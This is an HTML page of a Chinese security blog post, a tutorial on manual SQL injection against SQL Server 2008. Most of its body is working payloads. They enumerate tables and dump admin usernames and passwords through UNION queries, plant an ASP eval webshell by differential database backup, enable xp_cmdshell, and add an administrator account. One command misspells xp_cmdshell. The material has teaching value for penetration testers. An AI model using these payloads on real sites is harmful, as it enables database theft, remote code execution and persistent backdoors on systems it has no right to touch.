<!doctype html>



  


<html class="theme-next muse use-motion">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>



<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />












  
  
  <link href="/vendors/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css" />




  
  
  
  

  
    
    
  

  

  

  

  

  
    
    
    <link href="//fonts.googleapis.com/css?family=Lato:300,300italic,400,400italic,700,700italic&subset=latin,latin-ext" rel="stylesheet" type="text/css">
  






<link href="/vendors/font-awesome/css/font-awesome.min.css?v=4.4.0" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=5.0.1" rel="stylesheet" type="text/css" />


  <meta name="keywords" content="Hexo, NexT" />








  <link rel="shortcut icon" type="image/x-icon" href="/favicon.ico?v=5.0.1" />






<meta name="description" content="SQL注入之sqlserver注入前言SQL注入漏洞（SQL injection）是Web层面最高危的漏洞之一。在2008年至2010年期间，SQL连续3年在OWASP年度十大漏洞排行中排名第一。随着Web应用程序安全性不断提高，SQL注入漏洞逐渐减少，同时也变得更加难以检测与利用。最近打算将sqlserver、mysql，oracle的手工注入以及sqlmap的使用方法写成一个系列，便于自己回忆">
<meta property="og:type" content="article">
<meta property="og:title" content="SQL注入之sqlserver注入">
<meta property="og:url" content="http://yoursite.com/2015/03/11/sql注入之sqlserver/index.html">
<meta property="og:site_name" content="superDiao">
<meta property="og:description" content="SQL注入之sqlserver注入前言SQL注入漏洞（SQL injection）是Web层面最高危的漏洞之一。在2008年至2010年期间，SQL连续3年在OWASP年度十大漏洞排行中排名第一。随着Web应用程序安全性不断提高，SQL注入漏洞逐渐减少，同时也变得更加难以检测与利用。最近打算将sqlserver、mysql，oracle的手工注入以及sqlmap的使用方法写成一个系列，便于自己回忆">
<meta property="og:updated_time" content="2016-10-12T17:18:18.867Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="SQL注入之sqlserver注入">
<meta name="twitter:description" content="SQL注入之sqlserver注入前言SQL注入漏洞（SQL injection）是Web层面最高危的漏洞之一。在2008年至2010年期间，SQL连续3年在OWASP年度十大漏洞排行中排名第一。随着Web应用程序安全性不断提高，SQL注入漏洞逐渐减少，同时也变得更加难以检测与利用。最近打算将sqlserver、mysql，oracle的手工注入以及sqlmap的使用方法写成一个系列，便于自己回忆">



<script type="text/javascript" id="hexo.configuration">
  var NexT = window.NexT || {};
  var CONFIG = {
    scheme: 'Muse',
    sidebar: {"position":"left","display":"post"},
    fancybox: true,
    motion: true,
    duoshuo: {
      userId: 11954855,
      author: '超人不会飞'
    }
  };
</script>

  <title> SQL注入之sqlserver注入 | superDiao </title>
</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">

  










  
  
    
  

  <div class="container one-collumn sidebar-position-left page-post-detail ">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-meta ">
  

  <div class="custom-logo-site-title">
    <a href="/"  class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <span class="site-title">superDiao</span>
      <span class="logo-line-after"><i></i></span>
    </a>
  </div>
  <p class="site-subtitle"></p>
</div>

<div class="site-nav-toggle">
  <button>
    <span class="btn-bar"></span>
    <span class="btn-bar"></span>
    <span class="btn-bar"></span>
  </button>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br />
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br />
            
            归档
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br />
            
            标签
          </a>
        </li>
      

      
        <li class="menu-item menu-item-search">
          
            <a href="#" class="st-search-show-outputs">
          
            
              <i class="menu-item-icon fa fa-search fa-fw"></i> <br />
            
            搜索
          </a>
        </li>
      
    </ul>
  

  
    <div class="site-search">
      
  <form class="site-search-form">
  <input type="text" id="st-search-input" class="st-search-input st-default-search-input" />
</form>

<script type="text/javascript">
  (function(w,d,t,u,n,s,e){w['SwiftypeObject']=n;w[n]=w[n]||function(){
    (w[n].q=w[n].q||[]).push(arguments);};s=d.createElement(t);
    e=d.getElementsByTagName(t)[0];s.async=1;s.src=u;e.parentNode.insertBefore(s,e);
  })(window,document,'script','//s.swiftypecdn.com/install/v2/st.js','_st');

  _st('install', '5TaQ1ELKgGMaJxmr4joh','2.0.0');
</script>



    </div>
  
</nav>

 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  
  

  
  
  

  <article class="post post-type-normal " itemscope itemtype="http://schema.org/Article">

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">
            
            
              
                SQL注入之sqlserver注入
              
            
          </h1>
        

        <div class="post-meta">
          <span class="post-time">
            <span class="post-meta-item-icon">
              <i class="fa fa-calendar-o"></i>
            </span>
            <span class="post-meta-item-text">发表于</span>
            <time itemprop="dateCreated" datetime="2015-03-11T23:51:55+08:00" content="2015-03-11">
              2015-03-11
            </time>
          </span>

          
            <span class="post-category" >
              &nbsp; | &nbsp;
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              <span class="post-meta-item-text">分类于</span>
              
                <span itemprop="about" itemscope itemtype="https://schema.org/Thing">
                  <a href="/categories/Web安全/" itemprop="url" rel="index">
                    <span itemprop="name">Web安全</span>
                  </a>
                </span>

                
                

              
            </span>
          

          
            
              <span class="post-comments-count">
                &nbsp; | &nbsp;
                <a href="/2015/03/11/sql注入之sqlserver/#comments" itemprop="discussionUrl">
                  <span class="post-comments-count ds-thread-count" data-thread-key="2015/03/11/sql注入之sqlserver/" itemprop="commentsCount"></span>
                </a>
              </span>
            
          

          

          
          
             <span id="/2015/03/11/sql注入之sqlserver/" class="leancloud_visitors" data-flag-title="SQL注入之sqlserver注入">
               &nbsp; | &nbsp;
               <span class="post-meta-item-icon">
                 <i class="fa fa-eye"></i>
               </span>
               <span class="post-meta-item-text">阅读次数 </span>
               <span class="leancloud-visitors-count"></span>
              </span>
          

          
        </div>
      </header>
    


    <div class="post-body" itemprop="articleBody">

      
      

      
        <h1 id="SQL注入之sqlserver注入"><a href="#SQL注入之sqlserver注入" class="headerlink" title="SQL注入之sqlserver注入"></a>SQL注入之sqlserver注入</h1><h2 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h2><p>SQL注入漏洞（SQL injection）是Web层面最高危的漏洞之一。在2008年至2010年期间，SQL连续3年在OWASP年度十大漏洞排行中排名第一。随着Web应用程序安全性不断提高，SQL注入漏洞逐渐减少，同时也变得更加难以检测与利用。<br>最近打算将sqlserver、mysql，oracle的手工注入以及sqlmap的使用方法写成一个系列，便于自己回忆总结，也方便大家学习。此文主要讲SQL注入的原理及sqlserver的注入技巧。<br><a id="more"></a></p>
<h2 id="SQL注入原理及介绍"><a href="#SQL注入原理及介绍" class="headerlink" title="SQL注入原理及介绍"></a>SQL注入原理及介绍</h2><h3 id="SQL注入原理"><a href="#SQL注入原理" class="headerlink" title="SQL注入原理"></a>SQL注入原理</h3><p>SQL注入的攻击本质，是把用户输入的数据当做代码执行。要想实现，必须有两个关键条件，一是用户能够控制输入，二是程序要执行的代码，拼接了用户输入的数据。</p>
<h3 id="SQL注入技术类型"><a href="#SQL注入技术类型" class="headerlink" title="SQL注入技术类型"></a>SQL注入技术类型</h3><h4 id="显示数据的方法："><a href="#显示数据的方法：" class="headerlink" title="显示数据的方法："></a>显示数据的方法：</h4><blockquote>
<pre><code>1.显错注入
2.盲注入（布尔注入、延时注入、报错注入、联合查询注入、堆查询注入、 DNS查询注入）。
</code></pre><ol>
<li>布尔注入：速度太慢，所需语句太多</li>
<li>延时注入：不但慢，而且影像数据库，影响实际环境，只能在测试环境中使用</li>
<li>报错注入：一般都显示自定义错误。实际环境中基本上没用</li>
<li>联合查询注入：速度最快，不受显示错误影响，没有风险，推荐使用</li>
<li>堆查询注入：局限性比较大，容易收到API或者数据库引擎不支持的限制</li>
<li>DNS查询注入：远程反弹式的注入（敏感服务器不会设置DNS）</li>
</ol>
</blockquote>
<h4 id="操作数据方法："><a href="#操作数据方法：" class="headerlink" title="操作数据方法："></a>操作数据方法：</h4><blockquote>
<pre><code>select、update、insert、delete。
</code></pre></blockquote>
<h3 id="攻击点功能向量"><a href="#攻击点功能向量" class="headerlink" title="攻击点功能向量"></a>攻击点功能向量</h3><p>一般sql注入的攻击功能点都存在以下页面中：</p>
<blockquote>
<pre><code>常见的文章显示、分类展。 
用户注册、登录处。 
关键字搜索、文件下载处。 
数据统计处（订单查询、上传下载等）经典的如  selectselect 下拉框注入。 下拉框注入。 下拉框注入。
逻辑略复杂处  (密码找回以及跟安全相关的)。
伪静态 HTML
搜索源码中的?获得动态地址。 获得动态地址。 获得动态地址。
</code></pre></blockquote>
<h4 id="SQL注入技术类型："><a href="#SQL注入技术类型：" class="headerlink" title="SQL注入技术类型："></a>SQL注入技术类型：</h4><p>一次sql攻击成功与否，虽然按照上面四种必要元素中的语句结构：<strong>攻击请求向量、数据类型、显示数据方法、操作数据方法</strong>，缺一不可，错过一个环节，攻击就会无效。但总体来说，SQL注入技术架构主要是在<strong>显示数据方法</strong>中的<strong>报错注入</strong>和<strong>盲注入</strong>展开的。</p>
<h3 id="如何判断："><a href="#如何判断：" class="headerlink" title="如何判断："></a>如何判断：</h3><p>通常情况下，SQL注入一般存在于形如：<a href="http://xxxx.xxx.xxx/abc.asp？id=xx等带有参数的动态页面中，有时一个动态网页中只有一个参数，有时可能有N个参数，有时是整形参数，有时是字符串型参数，不能一概而论。总之只要带有参数的动态网页并且此网页访问了数据库，那么就有可能存在SQL注入。如果程序员没有安全意识，没有进行必要的字符过滤，存在SQL注入的可能性就非常大。" target="_blank" rel="external">http://xxxx.xxx.xxx/abc.asp？id=xx等带有参数的动态页面中，有时一个动态网页中只有一个参数，有时可能有N个参数，有时是整形参数，有时是字符串型参数，不能一概而论。总之只要带有参数的动态网页并且此网页访问了数据库，那么就有可能存在SQL注入。如果程序员没有安全意识，没有进行必要的字符过滤，存在SQL注入的可能性就非常大。</a></p>
<p>1、整形参数的判断</p>
<blockquote>
<pre><code>http://xxxx.xxx.xxx/abc.asp？id=xx&apos; 在xx后面加上&apos;运行，如果运行正常，则说明此页面可以注入&apos;
http://xxxx.xxx.xxx/abc.asp？id=xx-0
http://xxxx.xxx.xxx/abc.asp？id=xx-1 如果xx-0正常，xx-1异常，则说明此页面可以注入
</code></pre></blockquote>
<p>2、字符型参数的判断</p>
<blockquote>
<pre><code>http://xxxx.xxx.xxx/abc.asp？id=xx&apos; 在xx后面加上&apos;运行，如果运行正常，则说明此页面可以注入&apos;
http://xxxx.xxx.xxx/abc.asp？id=xx and a=a
http://xxxx.xxx.xxx/abc.asp？id=xx and a=b 如果id=xx and a=a正常，id=xx and a=b异常，这说明此页面可以注入
</code></pre></blockquote>
<h4 id="数据库的判断"><a href="#数据库的判断" class="headerlink" title="数据库的判断"></a>数据库的判断</h4><p>在查点时一般可以大致猜测到数据库的类型，不过不够准确，所以在sql注入时需要使用注入来准确判断数据库的类型。</p>
<p>MySQL</p>
<blockquote>
<pre><code>/*!%20s*/        错误则是MySQL
/*!40000%20s*/ 错误则版本大于4.0      (大于4.0支持UNION注入)
/*!60000%20s*/ 正常则版本小于6.0
/*!50130%20s*/ 错误则版本是5.1.30
/*pc     //正常为MySQL
</code></pre></blockquote>
<p>ORACLE</p>
<blockquote>
<pre><code>oracle支持--pc,不支持;
</code></pre></blockquote>
<p>SQL Server</p>
<blockquote>
<pre><code>and exists(select @@version)-- //正常为SQL Server
</code></pre></blockquote>
<h2 id="SQL-Server-2008手工注入"><a href="#SQL-Server-2008手工注入" class="headerlink" title="SQL Server 2008手工注入"></a>SQL Server 2008手工注入</h2><p>完成成功的sql手工注入需要一步一步的判断，下面是具体操作。</p>
<h3 id="判断字段数"><a href="#判断字段数" class="headerlink" title="判断字段数"></a>判断字段数</h3><p>显示数据库信息字段数查找</p>
<blockquote>
<pre><code>id=1/**/Order/**/By/**/5/**/--         正常则字段数≥5
id=1/**/Order/**/By/**/6/**/--         错误则字段数＜6
</code></pre></blockquote>
<h3 id="判断字段数据类型"><a href="#判断字段数据类型" class="headerlink" title="判断字段数据类型"></a>判断字段数据类型</h3><blockquote>
<pre><code>id=1/**/union/**/all/**/select/**/NULL,NULL,NULL,NULL,NULL--
id=1/**/union/**/all/**/select/**/NULL,NULL,’test’,NULL,NULL--
</code></pre><p>通过联合查询来判断字段数据类型，正常说明第3字段为字符型可以显示SQL注入数据。</p>
</blockquote>
<h3 id="显示数据库版本"><a href="#显示数据库版本" class="headerlink" title="显示数据库版本"></a>显示数据库版本</h3><blockquote>
<pre><code>id=1/**/and/**/1=2/**/union/**/all/**/select/**/NULL,NULL,@@version,NULL,NULL--
</code></pre></blockquote>
<h3 id="当前库名"><a href="#当前库名" class="headerlink" title="当前库名"></a>当前库名</h3><blockquote>
<pre><code>and/**/1=2/**/union/**/all/**/select/**/NULL,db_name(),NULL,NULL,NULL from sysobjects--
</code></pre></blockquote>
<h3 id="指定库表名"><a href="#指定库表名" class="headerlink" title="指定库表名"></a>指定库表名</h3><blockquote>
<pre><code>and/**/1=2/**/union/**/all/**/select/**/NULL,(select top 1 name from库名..sysobjects where xtype=&apos;u&apos; and name not in(select top 0 name from 库名..sysobjects where xtype=&apos;u&apos;)),NULL,NULL,NULL from sysobjects--
</code></pre></blockquote>
<h3 id="当前库查询表名"><a href="#当前库查询表名" class="headerlink" title="当前库查询表名"></a>当前库查询表名</h3><blockquote>
<pre><code>and/**/1=2/**/union/**/all/**/select/**/NULL,(select top 1 name from sysobjects where xtype=&apos;u&apos; and name not in(select top 0 name from sysobjects where xtype=&apos;u&apos;)),NULL,NULL,NULL from sysobjects--
and/**/1=2/**/union/**/all/**/select/**/NULL,(select top 1 name from sysobjects where xtype=&apos;u&apos; and name not in(select top 1 name from sysobjects where xtype=&apos;u&apos;)),NULL,NULL,NULL from sysobjects--
</code></pre></blockquote>
<p>查询表名(从0开始增加第二个top N的数字就可以遍历当前数据库表名了。</p>
<h3 id="字段名"><a href="#字段名" class="headerlink" title="字段名"></a>字段名</h3><blockquote>
<pre><code>id=1/**/and/**/1=2/**/union/**/all/**/select/**/NULL,(select top 1 name from syscolumns where id in (select id from sysobjects where name=&apos;admin&apos;) and name not in (select top 1 name from syscolumns where id in (select id from sysobjects where name=&apos;admin&apos;))),NULL,NULL,NULL from sysobjects--
id=1/**/and/**/1=2/**/union/**/all/**/select/**/NULL,(select top 1 name from syscolumns where id in (select id from sysobjects where name=&apos;admin&apos;) and name not in (select top 2 name from syscolumns where id in (select id from sysobjects where name=&apos;admin&apos;))),NULL,NULL,NULL from sysobjects--
id=1/**/and/**/1=2/**/union/**/all/**/select/**/NULL,(select top 1 name from syscolumns where id in (select id from sysobjects where name=&apos;admin&apos;) and name not in (select top 3 name from syscolumns where id in (select id from sysobjects where name=&apos;admin&apos;))),NULL,NULL,NULL from sysobjects--
id=1/**/and/**/1=2/**/union/**/all/**/select/**/NULL,(select top 1 name from syscolumns where id in (select id from sysobjects where name=&apos;admin&apos;) and name not in (select top 4 name from syscolumns where id in (select id from sysobjects where name=&apos;admin&apos;))),NULL,NULL,NULL from sysobjects--
</code></pre></blockquote>
<p>从0开始增加第二个top N的数字就可以遍历admin表的字段名了</p>
<h3 id="字段值"><a href="#字段值" class="headerlink" title="字段值"></a>字段值</h3><p>id=1 and 1=2 union all select id,username,password,NULL,NULL from admin–</p>
<h3 id="WebShell写入"><a href="#WebShell写入" class="headerlink" title="WebShell写入"></a>WebShell写入</h3><p>为了安全起见，大多情况下数据库与web会分离，如果没有分离则可以写入webshell。</p>
<p>数据库与web是否分离的判断：</p>
<p>网站主机名：select host_name();</p>
<p>数据库主机名：select @@servername;</p>
<p>使用差异备份来写入webshell：</p>
<blockquote>
<pre><code>;drop table cmd--
使用progra~1的意思是遍历progra，然后选中遍历的第一个
;backup database testdb to disk =&apos;c:\progra~1\cmd.bak&apos;--
;create table cmd(cmd image)--
;insert into cmd(cmd) values(0x3c256576616c207265717565737428224d482229253e)-- 
;backup database testdb to disk=&apos;C:\Inetpub\wwwroot\shell.asp&apos; with differential,format--
;drop table cmd--
</code></pre></blockquote>
<h3 id="执行系统命令"><a href="#执行系统命令" class="headerlink" title="执行系统命令"></a>执行系统命令</h3><p>想执行系统命令的话需要当前数据库连接用户权限为sa。</p>
<p>判断是否为sa用户：如果页面正常则为sa</p>
<blockquote>
<pre><code>AND 1=(SELECT IS_SRVROLEMEMBER(&apos;sysadmin&apos;)); AND 1=(SELECT IS_SRVROLEMEMBER(&apos;sysadmin&apos;));--
</code></pre></blockquote>
<p>开启默认禁用的xp_cmdshell</p>
<blockquote>
<pre><code>;EXEC sp_configure &apos;show advanced options&apos;, 1;RECONFIGURE;EXEC sp_configure &apos;xp_cmdshell&apos;,1;RECONFIGURE;--
</code></pre></blockquote>
<p>使用xp_cmdshell存储过程执行操作系统命令（盲注环境无回显）</p>
<blockquote>
<pre><code>;EXEC master..xp_xmdshell&quot;net user administrator1 1qaz2wsx/add&quot;
</code></pre></blockquote>

      
    </div>

    <div>
      
        
      
    </div>

    <div>
      
        

      
    </div>

    <footer class="post-footer">
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2014/12/25/Web踩点/" rel="next" title="Web安全之踩点思路">
                <i class="fa fa-chevron-left"></i> Web安全之踩点思路
              </a>
            
          </div>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2015/03/15/sql注入之mysql/" rel="prev" title="SQL注入之MySQL注入">
                SQL注入之MySQL注入 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </article>



    <div class="post-spread">
      
        <div class="ds-share flat" data-thread-key="2015/03/11/sql注入之sqlserver/"
     data-title="SQL注入之sqlserver注入"
     data-content=""
     data-url="http://yoursite.com/2015/03/11/sql注入之sqlserver/">
  <div class="ds-share-inline">
    <ul  class="ds-share-icons-16">

      <li data-toggle="ds-share-icons-more"><a class="ds-more" href="javascript:void(0);">分享到：</a></li>
      <li><a class="ds-weibo" href="javascript:void(0);" data-service="weibo">微博</a></li>
      <li><a class="ds-qzone" href="javascript:void(0);" data-service="qzone">QQ空间</a></li>
      <li><a class="ds-qqt" href="javascript:void(0);" data-service="qqt">腾讯微博</a></li>
      <li><a class="ds-wechat" href="javascript:void(0);" data-service="wechat">微信</a></li>

    </ul>
    <div class="ds-share-icons-more">
    </div>
  </div>
</div>
      
    </div>
  </div>


          </div>
          

  <p>热评文章</p>
  <div class="ds-top-threads" data-range="weekly" data-num-items="4"></div>


          
  <div class="comments" id="comments">
    
      <div class="ds-thread" data-thread-key="2015/03/11/sql注入之sqlserver/"
           data-title="SQL注入之sqlserver注入" data-url="http://yoursite.com/2015/03/11/sql注入之sqlserver/">
      </div>
    
  </div>


        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap" >
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview sidebar-panel ">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
          <img class="site-author-image" itemprop="image"
               src="/images/nan.gif"
               alt="SuperDiao" />
          <p class="site-author-name" itemprop="name">SuperDiao</p>
          <p class="site-description motion-element" itemprop="description">keep calm and carry on</p>
        </div>
        <nav class="site-state motion-element">
          <div class="site-state-item site-state-posts">
            <a href="/archives">
              <span class="site-state-item-count">23</span>
              <span class="site-state-item-name">日志</span>
            </a>
          </div>

          
            <div class="site-state-item site-state-categories">
              
                <span class="site-state-item-count">8</span>
                <span class="site-state-item-name">分类</span>
              
            </div>
          

          
            <div class="site-state-item site-state-tags">
              <a href="/tags">
                <span class="site-state-item-count">8</span>
                <span class="site-state-item-name">标签</span>
              </a>
            </div>
          

        </nav>

        

        <div class="links-of-author motion-element">
          
            
              <span class="links-of-author-item">
                <a href="" target="_blank" title="GitHub">
                  
                    <i class="fa fa-fw fa-github"></i>
                  
                  GitHub
                </a>
              </span>
            
              <span class="links-of-author-item">
                <a href="" target="_blank" title="微博">
                  
                    <i class="fa fa-fw fa-globe"></i>
                  
                  微博
                </a>
              </span>
            
              <span class="links-of-author-item">
                <a href="" target="_blank" title="知乎">
                  
                    <i class="fa fa-fw fa-globe"></i>
                  
                  知乎
                </a>
              </span>
            
          
        </div>

        
        

        
        

      </section>

      
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">
            
              
            
            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#SQL注入之sqlserver注入"><span class="nav-number">1.</span> <span class="nav-text">SQL注入之sqlserver注入</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#前言"><span class="nav-number">1.1.</span> <span class="nav-text">前言</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#SQL注入原理及介绍"><span class="nav-number">1.2.</span> <span class="nav-text">SQL注入原理及介绍</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#SQL注入原理"><span class="nav-number">1.2.1.</span> <span class="nav-text">SQL注入原理</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#SQL注入技术类型"><span class="nav-number">1.2.2.</span> <span class="nav-text">SQL注入技术类型</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#显示数据的方法："><span class="nav-number">1.2.2.1.</span> <span class="nav-text">显示数据的方法：</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#操作数据方法："><span class="nav-number">1.2.2.2.</span> <span class="nav-text">操作数据方法：</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#攻击点功能向量"><span class="nav-number">1.2.3.</span> <span class="nav-text">攻击点功能向量</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#SQL注入技术类型："><span class="nav-number">1.2.3.1.</span> <span class="nav-text">SQL注入技术类型：</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#如何判断："><span class="nav-number">1.2.4.</span> <span class="nav-text">如何判断：</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#数据库的判断"><span class="nav-number">1.2.4.1.</span> <span class="nav-text">数据库的判断</span></a></li></ol></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#SQL-Server-2008手工注入"><span class="nav-number">1.3.</span> <span class="nav-text">SQL Server 2008手工注入</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#判断字段数"><span class="nav-number">1.3.1.</span> <span class="nav-text">判断字段数</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#判断字段数据类型"><span class="nav-number">1.3.2.</span> <span class="nav-text">判断字段数据类型</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#显示数据库版本"><span class="nav-number">1.3.3.</span> <span class="nav-text">显示数据库版本</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#当前库名"><span class="nav-number">1.3.4.</span> <span class="nav-text">当前库名</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#指定库表名"><span class="nav-number">1.3.5.</span> <span class="nav-text">指定库表名</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#当前库查询表名"><span class="nav-number">1.3.6.</span> <span class="nav-text">当前库查询表名</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#字段名"><span class="nav-number">1.3.7.</span> <span class="nav-text">字段名</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#字段值"><span class="nav-number">1.3.8.</span> <span class="nav-text">字段值</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#WebShell写入"><span class="nav-number">1.3.9.</span> <span class="nav-text">WebShell写入</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#执行系统命令"><span class="nav-number">1.3.10.</span> <span class="nav-text">执行系统命令</span></a></li></ol></li></ol></li></ol></div>
            
          </div>
        </section>
      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <script async src="https://dn-lbstatics.qbox.me/busuanzi/2.3/busuanzi.pure.mini.js">
</script>
<div class="copyright" >
  
  &copy;  2014 - 
  <span itemprop="copyrightYear">2017</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">SuperDiao</span>
</div>

<div class="powered-by">
  由 <a class="theme-link" href="http://hexo.io">Hexo</a> 强力驱动
</div>

<div class="theme-info">
  主题 -
  <a class="theme-link" href="https://github.com/iissnan/hexo-theme-next">
    NexT.Muse
  </a>
</div>

        

        
      </div>
    </footer>

    <div class="back-to-top">
      <i class="fa fa-arrow-up"></i>
    </div>
  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  



  
  <script type="text/javascript" src="/vendors/jquery/index.js?v=2.1.3"></script>

  
  <script type="text/javascript" src="/vendors/fastclick/lib/fastclick.min.js?v=1.0.6"></script>

  
  <script type="text/javascript" src="/vendors/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>

  
  <script type="text/javascript" src="/vendors/velocity/velocity.min.js?v=1.2.1"></script>

  
  <script type="text/javascript" src="/vendors/velocity/velocity.ui.min.js?v=1.2.1"></script>

  
  <script type="text/javascript" src="/vendors/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.0.1"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.0.1"></script>



  
  

  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.0.1"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.0.1"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.0.1"></script>



  

  
    
  

  <script type="text/javascript">
    var duoshuoQuery = {short_name:"superdiao"};
    (function() {
      var ds = document.createElement('script');
      ds.type = 'text/javascript';ds.async = true;
      ds.id = 'duoshuo-script';
      ds.src = (document.location.protocol == 'https:' ? 'https:' : 'http:') + '//static.duoshuo.com/embed.js';
      ds.charset = 'UTF-8';
      (document.getElementsByTagName('head')[0]
      || document.getElementsByTagName('body')[0]).appendChild(ds);
    })();
  </script>

  
    
      
      <script src="/vendors/ua-parser-js/dist/ua-parser.min.js?v=0.7.9"></script>
      <script src="/js/src/hook-duoshuo.js"></script>
    
  





  
  
  

  

  
  <script src="https://cdn1.lncld.net/static/js/av-core-mini-0.6.1.js"></script>
  <script>AV.initialize("Y4DRvcdFfo0vM2ibxmuwpc8q-gzGzoHsz", "5725tccldraSXqd6QUaJnLYS");</script>
  <script>
    function showTime(Counter) {
      var query = new AV.Query(Counter);
      var entries = [];
      var $visitors = $(".leancloud_visitors");

      $visitors.each(function () {
        entries.push( $(this).attr("id").trim() );
      });

      query.containedIn('url', entries);
      query.find()
        .done(function (results) {
          var COUNT_CONTAINER_REF = '.leancloud-visitors-count';

          if (results.length === 0) {
            $visitors.find(COUNT_CONTAINER_REF).text(0);
            return;
          }

          for (var i = 0; i < results.length; i++) {
            var item = results[i];
            var url = item.get('url');
            var time = item.get('time');
            var element = document.getElementById(url);

            $(element).find(COUNT_CONTAINER_REF).text(time);
          }
        })
        .fail(function (object, error) {
          console.log("Error: " + error.code + " " + error.message);
        });
    }

    function addCount(Counter) {
      var $visitors = $(".leancloud_visitors");
      var url = $visitors.attr('id').trim();
      var title = $visitors.attr('data-flag-title').trim();
      var query = new AV.Query(Counter);

      query.equalTo("url", url);
      query.find({
        success: function(results) {
          if (results.length > 0) {
            var counter = results[0];
            counter.fetchWhenSave(true);
            counter.increment("time");
            counter.save(null, {
              success: function(counter) {
                var $element = $(document.getElementById(url));
                $element.find('.leancloud-visitors-count').text(counter.get('time'));
              },
              error: function(counter, error) {
                console.log('Failed to save Visitor num, with error message: ' + error.message);
              }
            });
          } else {
            var newcounter = new Counter();
            /* Set ACL */
            var acl = new AV.ACL();
            acl.setPublicReadAccess(true);
            acl.setPublicWriteAccess(true);
            newcounter.setACL(acl);
            /* End Set ACL */
            newcounter.set("title", title);
            newcounter.set("url", url);
            newcounter.set("time", 1);
            newcounter.save(null, {
              success: function(newcounter) {
                var $element = $(document.getElementById(url));
                $element.find('.leancloud-visitors-count').text(newcounter.get('time'));
              },
              error: function(newcounter, error) {
                console.log('Failed to create');
              }
            });
          }
        },
        error: function(error) {
          console.log('Error:' + error.code + " " + error.message);
        }
      });
    }

    $(function() {
      var Counter = AV.Object.extend("Counter");
      if ($('.leancloud_visitors').length == 1) {
        addCount(Counter);
      } else if ($('.post-title-link').length > 1) {
        showTime(Counter);
      }
    });
  </script>



  

</body>
</html>
